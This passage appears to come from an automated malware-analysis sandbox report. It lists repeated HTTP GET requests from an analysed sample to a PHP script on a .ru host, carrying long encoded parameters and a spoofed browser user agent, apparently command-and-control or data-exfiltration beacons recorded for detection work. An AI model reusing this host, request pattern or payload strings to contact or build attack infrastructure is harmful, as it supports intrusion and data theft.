dVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ruConnection: Keep-Alive
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /8724b2c0.php?JXADoN71DREbXlN5ShtBqUILw=EapRi6atSHCfexR2Fv1OzkYpt1k&FyPyQyIgLvtHBoSG3xD6uxPWTiAeB=iq&ene1NOpourTC=MLRSv5yoKRj2fsyneKNDwgAy&7545dfb3365e5b9fe53ef5879182e1a7=0df81b81d71e3e7c3a0591c145dca1b2&64f08b8004af955eddd13c6a6e9c8200=QNzATY3I2NxImYzQDM4EDMihjY4ImNmJWYwAzYwQmZmV2MxcDNhBDN&JXADoN71DREbXlN5ShtBqUILw=EapRi6atSHCfexR2Fv1OzkYpt1k&FyPyQyIgLvtHBoSG3xD6uxPWTiAeB=iq&ene1NOpourTC=MLRSv5yoKRj2fsyneKNDwgAy HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=QX9JiI6IiMyEjNwkDO0UWNhJ2M0EjZycDMkRGZ1E2Y0gTZiVzYiJCLiUWM3EGZlVmN1EWYzEWO1cTOmFGNzIWNjNmZ4EGMkZWYyM2N4cTZkVmI6ICMmdDZwEmY2EjYiNmZzkTZ5I2NkFjY0ImMiRjY3kTZkJCLiMGOkFzYzMzN2gTOjFzYzcjMxUDOhRGZxcDMwYTNzImNhRWY3QmMyYmI6IiNlBjMzgzY0EGOxEGNhFWZ5QGO1MzM5QjNyMGZmBjZwIyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplEbahVYw40VRl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
            Source: global trafficHTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&a84a2843b4ef9db88df9dc44c2636162=0VfiIiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI0ITOlhzNhJzM4EjZmRTZlZTOiVWYkZmNiRTM2YWYykTOlVTMzQTNzIiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
            Source: global trafficHTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&b23843f8eb998a6848c0ef54cab04792=QX9JSUml2auNGbaNjYqZVbVNGes9ERKl2Tpd2RkhmQsl0cJlmYzkTbiJXNXZVavpWSvJFWZFlUtNmdOJzYwJ1aJNXSplkNJNUYwY0RVRnRtNmbWdkYsJFbJNXSplkNJl3Y3JEWRRnRXpFMOxWSzlUaiNTOtJmc1clVp9maJVEbrNGbOhlV0Z0VaBjTsl0cJlmYzkTbiJXNXZVavpWS5ZlMjZVMXlFbSNTVpdXaJVHZzIWd01mYWpUaPl2YtJGa4VlYoZ1RkRlSDxUa0IDZ2VjMhVnVslkNJNUYwY0RVRnRXpFMOxWSzl0UZJTSXlFdBR0TyklaOBTQql1N1MlZ3FERNdXQE10dBpGT4RzQNVXQ6VWavpWS6ZVbiZHaHNmdKNTWwFzaJNXSplkNJl3Y0ZkMZlmVyYVa3lWS1hHbjNmRUdlQ4VUVUxWRSNGesx0Y4ZEWjpUaPlWTuJGbW12Yq5EbJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI0ITOlhzNhJzM4EjZmRTZlZTOiVWYkZmNiRTM2YWYykTOlVTMzQTNzIiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
            Source: global trafficHTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
            Source: global trafficHTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
            Source: global trafficHTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
            Source: global trafficHTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEM